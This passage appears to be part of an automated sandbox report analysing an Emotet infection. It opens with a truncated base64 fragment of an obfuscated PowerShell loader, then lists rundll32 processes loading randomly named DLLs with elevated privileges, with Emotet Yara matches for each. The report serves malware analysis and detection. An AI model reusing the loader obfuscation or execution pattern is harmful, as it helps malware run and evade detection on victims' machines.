CAAJABRAGYAXwB6ADYANgB0ACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAKAAnAFMAdAAnACsAJwByAGkAJwApACsAJwBuAGcAJwApAC4AIgBUAE8AYABzAHQAYABSAEkATgBnACIAKAApADsAJABZADIAOABLAD0AKAAnAEUAJwArACgAJwAxACcAKwAnADQAVgAnACkAKQA7AGIAcgBlAGEAawA7ACQARAA4ADMAUQA9ACgAJwBUACcAKwAoACcAXwAnACsAJwAwAEgAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMAOQAxAEYAPQAoACcASAAnACsAKAAnADgAOAAnACsAJwBWACcAKQApAA==
                                            Imagebase:0x13f100000
                                            File size:473600 bytes
                                            MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Reputation:high

                                            General

                                            Start time:23:13:42
                                            Start date:25/01/2021
                                            Path:C:\Windows\System32\rundll32.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
                                            Imagebase:0xffa70000
                                            File size:45568 bytes
                                            MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Start time:23:13:42
                                            Start date:25/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
                                            Imagebase:0x3f0000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2092409320.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2092516972.00000000002F0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2092704885.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:23:13:43
                                            Start date:25/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1
                                            Imagebase:0x3f0000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2094913747.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2095103110.0000000000870000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2094951149.00000000002F0000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:23:13:44
                                            Start date:25/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',CnBGell
                                            Imagebase:0x3f0000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2097063566.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2097445507.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2096952501.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:23:13:44
                                            Start date:25/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',#1
                                            Imagebase:0x3f0000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2098118909.0000000000320000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2098009043.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2098032897.0000000000280000.00000040.00020000.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:23:13:45
                                            Start date:25/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',TJuSeqejTSAKMZ
                                            Imagebase:0x3f0000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2101634327.0000000000720000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2101426694.00000000003A0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2101331684.0000000000370000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:23:13:46
                                            Start date:25/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',#1
                                            Imagebase:0x3f0000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2336211532.0000000000260000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2336195679.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2336233664.00000000002D0000.00000040.00020000.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Disassembly

                                            Code Analysis

                                            Reset < >